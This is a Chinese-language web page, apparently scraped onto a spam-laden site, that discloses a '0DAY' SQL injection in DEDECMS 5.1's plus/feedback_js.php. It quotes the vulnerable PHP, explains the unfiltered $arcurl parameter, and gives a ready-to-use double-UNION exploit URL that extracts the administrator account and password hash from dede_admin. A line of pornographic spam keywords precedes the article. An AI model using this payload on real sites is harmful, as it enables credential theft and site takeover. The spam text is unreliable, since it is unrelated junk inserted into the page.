av激情亚洲男人的天堂国语,日韩欧美精品一中文字幕,无码av一区二区三区无码,国产又色又爽又刺激的a片,国产又色又爽又刺激的a片

DEDECMS 5.1 feedback_js.php 0DAY

這個漏洞是我和Rainy'Fox一起發(fā)現(xiàn)的

同樣是在magic_quotes_gpc=off的情況下可用

漏洞版本:DEDECMS 5.1

此漏洞可拿到后臺管理員的帳號和加密HASH,漏洞存在文件plus/feedback_js.php,未過濾參數(shù)為$arcurl

......
$urlindex = 0;
if(empty($arcID))
{
$row = $dlist->dsql->GetOne("Select id From `#@__cache_feedbackurl` where url='$arcurl' ");
//此處$arcurl沒有過濾
if(is_array($row)) $urlindex = $row['id'];
//存在結(jié)果則把$urlindex賦值為查詢到的$row['id'],我們可以構(gòu)造SQL語句帶入下面的操作中了
}
if(empty($arcID) && empty($urlindex)) exit();
//如果$arcID為空或$urlindex為空則退出
......
if(empty($arcID)) $wq = " urlindex = '$urlindex' ";
//我們讓$arcID為空,剛才上面執(zhí)行的結(jié)果就會被賦值給$wq帶入下面的操作中執(zhí)行了.
else $wq = " aid='$arcID' ";
$querystring = "select * from `#@__feedback` where $wq and ischeck='1' order by dtime desc";
$dlist->Init();
$dlist->SetSource($querystring);
......

看一下利用方法吧,嘿,為了閉合我用了兩次union

http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

【編輯推薦】

  1. 重新審視企業(yè)IPS的應(yīng)用:防御SQL注入攻擊的利劍
  2. SQL注入攻擊及其防范檢測技術(shù)研究
  3. 安全技巧:學(xué)會檢查SQL注入式攻擊漏洞

網(wǎng)站名稱:DEDECMS 5.1 feedback_js.php 0DAY
文章來源:http://uogjgqi.cn/article/cdihish.html
掃二維碼與項目經(jīng)理溝通

我們在微信上24小時期待你的聲音

解答本文疑問/技術(shù)咨詢/運營咨詢/技術(shù)建議/互聯(lián)網(wǎng)交流